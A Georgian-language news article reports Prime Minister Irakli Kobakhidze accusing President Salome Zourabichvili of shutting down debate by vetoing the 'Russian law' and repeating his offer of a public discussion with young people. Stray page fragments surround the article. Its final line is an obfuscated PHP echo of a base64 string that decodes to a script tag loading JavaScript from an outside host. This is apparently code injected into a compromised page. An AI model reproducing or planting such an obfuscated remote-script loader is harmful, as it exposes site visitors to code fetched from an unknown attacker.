celsiusi
ავერსი შნაიდერი

 პრემიერ-მინისტრი ირაკლი კობახიძე ამბობს, რომ პრეზიდენტმა „რუსულ კანონზე“ ვეტოს დადებით, დისკუსიისთვის ყველანაირი სივრცე ჩაკეტა.

კობახიძემ მთავრობის სხდომაზე კიდევ ერთხელ გაიმეორა, რომ კვლევის თანახმად, უშუალოდ კანონს მოსახლეობის 60%-ზე მეტი, არასამთავრობო ორგანიზაციების გამჭვირვალობას კი 80%-ზე მეტი უჭერს მხარს, ამიტომ „საღმა აზრმა უნდა გაიმარჯვოს“. მან ასევე აღნიშნა, რომ ოპონენტები მაქსიმალურად გაურბიან დისკუსიას.

„როგორც მოგეხსენებათ, სალომე ზურაბიშვილმა ვეტო დაადო ამ კანონს, რითაც ჩაკეტა ყველანაირი სივრცე დისკუსიისთვის. საერთაშორისო პარტნიორების მიმართ ჩვენი შეთავაზება იყო, რომ ვეტოს პროცედურა გამოგვეყენებინა პოზიციების შეჯერებისთვის, თუმცა სალომე ზურაბიშვილმა უხეშად დაადო ვეტო კანონს, რითაც სამწუხაროდ, ყველანაირი სივრცე ჩაიკეტა ჯანსაღი დისკუსიისთვის“,- თქვა კობახიძემ.

პრემიერმა ასევე აღნიშნა, რომ კვლავ ძალაშია შეთავაზება ახალგაზრდების მიმართ, საჯარო დისკუსიასთან დაკავშირებით.

„მე ასევე, როგორც მოგეხსენებათ, ახალგაზრდებს შევთავაზე, რომ მონაწილეობა მიეღოთ საჯარო დისკუსიაში, თუმცა იმავე წამს, რადიკალების მიერ დაიწყო ბულინგი ახალგაზრდების მიმართ და ამ პირობებში, ვერც ერთმა ჯგუფმა ვერ გარისკა საჯარო დისკუსიაში მონაწილეობა, რაც ძალიან სამწუხაროა. რა თქმა უნდა, ჩემი შეთავაზება კვლავაც ძალაში რჩება და იმედი მაქვს, რომ ერთი ჯგუფი მაინც თავს დააღწევს ბულინგს და მონაწილეობას მიიღებს ამ კანონთან დაკავშირებით საჯარო დისკუსიაში“,- თქვა კობახიძემ.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");